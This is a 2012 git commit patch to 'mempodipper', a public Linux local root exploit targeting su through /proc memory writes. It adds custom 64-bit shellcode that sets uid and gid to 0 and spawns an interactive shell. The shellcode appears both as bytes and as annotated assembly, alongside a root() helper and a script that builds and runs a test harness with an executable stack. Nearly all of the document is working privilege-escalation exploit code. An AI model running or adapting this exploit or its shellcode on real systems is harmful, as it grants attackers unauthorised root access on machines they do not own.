From df106c579d69056f4bcef612f324d4ef0d71fb05 Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld" <Jason@zx2c4.com>
Date: Sun, 22 Jan 2012 04:37:23 +0100
Subject: Add custom 64bit shellcode and preserve stderr.

---
 mempodipper.c    | 21 +++++++++++++++------
 run-shellcode.sh |  2 ++
 shellcode-64.s   | 49 +++++++++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 66 insertions(+), 6 deletions(-)
 create mode 100755 run-shellcode.sh
 create mode 100644 shellcode-64.s

diff --git a/mempodipper.c b/mempodipper.c
index b5efd53..1fb8cc2 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -113,6 +113,14 @@ int recv_fd()
 	return fd;
 }
 
+void root()
+{
+	dup2(6, 2);
+	setuid(0);
+	setgid(0);
+	execl("/bin/sh", "sh", "-i", NULL);
+}
+
 int main(int argc, char **argv)
 {
 	if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') {
@@ -145,6 +153,7 @@ int main(int argc, char **argv)
 			return -1;
 		}
 		printf("[+] Assigning fd %d to stderr.\n", fd);
+		dup2(2, 6);
 		dup2(fd, 2);
 /*
   Here is the asm from my /bin/su.
@@ -199,16 +208,16 @@ int main(int argc, char **argv)
 			"\x6a\x17\x58\x31\xdb\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f"
 			"\x62\x69\x6e\x89\xe3\x99\x31\xc9\xb0\x0b\xcd\x80";
 #elif defined(__x86_64__)
-		// Shellcode from: http://www.shell-storm.org/shellcode/files/shellcode-77.php
 		char shellcode[] =
-			"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62"
-			"\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31"
-			"\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c"
-			"\x58\x0f\x05";
+			"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
+			"\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
+			"\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
+			"\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
+			"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
 #else
 #error "That platform is not supported."
 #endif
-		printf("[+] Executing su with shellcode. There will be no prompt, so just type commands.\n");
+		printf("[+] Executing su with shellcode.\n");
 		execl("/bin/su", "su", shellcode, NULL);
 	} else {
 		sleep(0.01);
diff --git a/run-shellcode.sh b/run-shellcode.sh
new file mode 100755
index 0000000..5ffcf39
--- /dev/null
+++ b/run-shellcode.sh
@@ -0,0 +1,2 @@
+#!/bin/sh
+nasm -o /dev/stdout shellcode-64.s | msfencode4.0 -t c -e generic/none -b '\x00' > harness.c && echo "void main() { (*(void(*)())buf)(); }" >> harness.c && gcc -fno-stack-protector -z execstack -o harness harness.c && ./harness
diff --git a/shellcode-64.s b/shellcode-64.s
new file mode 100644
index 0000000..2514ed2
--- /dev/null
+++ b/shellcode-64.s
@@ -0,0 +1,49 @@
+BITS 64
+; This shell code sets uid and gid to 0 and execs a shell in interactive mode.
+; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper.
+;
+; by zx2c4
+
+
+;setuid(0)
+xor rdi,rdi
+mov al,0x69
+syscall
+;setgid(0)
+xor rdi,rdi
+mov al,0x6a
+syscall
+;dup2(6, 2)
+mov dil,0x6
+mov sil,0x2
+mov al,0x21
+syscall
+
+; execve("//bin/sh", ["//bin/sh", "-i", 0], 0)
+mov qword rbx,'//bin/sh'	; rbx = //bin/sh
+shr rbx,0x8			; remove leading / from rbx
+push rbx			; push rbx to stack
+mov rdi,rsp			; set rdi (arg 1) to top of stack
+
+xor rbx,rbx
+mov bx,'-i'			; rbx = '-i'
+push rbx			; push rbx to stack
+mov rcx,rsp			; set rcx to top of stack
+
+xor rax,rax			; rax = 0
+
+; so at this point:
+;	rdi is a pointer to '/bin/sh'
+;	rcx is a pointer to '-i'
+;	rax is null
+; since they are all the same size, we'll push them on the stack
+; and then it will be an array:
+push rax			; push rax to stack
+push rcx			; push rcx to stack
+push rdi			; push rdi to stack
+mov rsi,rsp			; set rsi (arg 2) to top of stack
+
+xor rdx,rdx			; rdx (arg 3) = 0
+
+mov al,0x3b			; al = 0x3b, which is the exec call
+syscall
-- 
cgit v1.2.3-59-g8ed1b